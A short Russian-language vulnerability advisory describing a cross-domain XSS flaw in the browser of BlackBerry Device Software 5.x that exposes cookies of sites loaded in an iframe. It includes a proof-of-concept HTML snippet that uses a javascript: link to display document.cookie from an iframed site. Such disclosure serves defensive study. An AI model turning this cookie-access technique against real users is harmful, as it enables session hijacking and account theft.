Программа: BlackBerry Device Software 5.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за того, что браузер не правильно
ограничивает междоменный доступ. Атакующий может получить доступ к cookies на
web сайте, вложенным в iframe.

Эксплоит:

Создайте файл file.htm, сохраните его включив код ниже и загрузите на ваш
сервер.

<a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test
me</a><br>
<iframe name="blackb" src="http://www.google.fr"> </iframe>

Оставить мнение